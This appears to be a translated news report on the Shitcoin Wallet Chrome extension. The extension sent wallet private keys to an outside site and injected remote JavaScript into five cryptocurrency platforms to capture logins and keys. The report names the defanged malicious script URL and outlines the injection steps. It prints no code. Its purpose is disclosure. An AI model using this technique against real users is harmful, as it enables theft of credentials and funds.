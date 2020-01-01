Loading...

It was discovered that a Google Chrome extension injected JavaScript code into web pages to steal passwords and private keys from cryptocurrency wallets and cryptocurrency portals.

The extension is called Shitcoin Wallet (Chrome extension ID: ckkgmccefffnbbalkmbbgebbojjogffn), and was launched last month, on December 9.

According to an introductory blog post, Shitcoin Wallet allows users to manage Ether (ETH) currencies, but also tokens based on Ethereum ERC20, tokens generally issued for ICO (initial coin offerings).

Users can install the Chrome extension and manage ETH currencies and ERC20 tokens from their browser, or they can install a Windows desktop application, if they want to manage their funds from outside a browser's riskiest environment.

Breakdown of malicious behavior

However, the wallet application was not what it promised to be. Yesterday, Harry Denley, Security Director of the MyCrypto platform, discovered that the extension contained malicious code.

According to Denley, the extension is dangerous for users in two ways. First, any fund (ETH currencies and ERC0-based tokens) managed directly within the extension is at risk.

Denley says the extension sends the private keys of all wallets created or managed through its interface to a third-party website located at erc20wallet (.) Tk.

Second, the extension also actively injects malicious JavaScript code when users navigate to five known and popular cryptocurrency management platforms. This code steals login credentials and private keys, data that is sent to the same third-party website erc20wallet (.) Tk.

According to an analysis of the malicious code, the process is as follows:

Users install the Chrome extension

The Chrome extension requests permission to inject JavaScript (JS) code into 77 websites (listed here)

When users navigate to any of these 77 sites, the extension loads and injects an additional JS file from: https: // erc20wallet (.) Tk / js / content_.js

This JS file contains obfuscated code (uncovered here)

The code is activated on five websites: MyEtherWallet.com , Idex.Market , Binance.org , NeoTracker.io Y Switcheo.exchange

, , , Y Once activated, the malicious JS code registers the user's login credentials, searches for private keys stored within the panels of the five services and, finally, sends the data to erc20wallet (.) Tk

At the time of writing this article, the extension was still available for download through the official Google Chrome web store, where 625 installations were listed.

It is not clear if the Shitcoin Wallet team is responsible for the malicious code, or if the Chrome extension was compromised by a third party. A spokesman for the Shitcoin Wallet team did not respond to a request for comment before the publication of this article.

Desktop application

On the official website of the extension, 32 and 64-bit installer users were also made available to users.

Scanning with VirusTotal, a website that adds virus scanning engines from several antivirus software manufacturers, shows both files as clean.

However, numerous comments published on the Wallet's Telegram channel suggest that desktop applications may contain similar malicious code, if not worse.

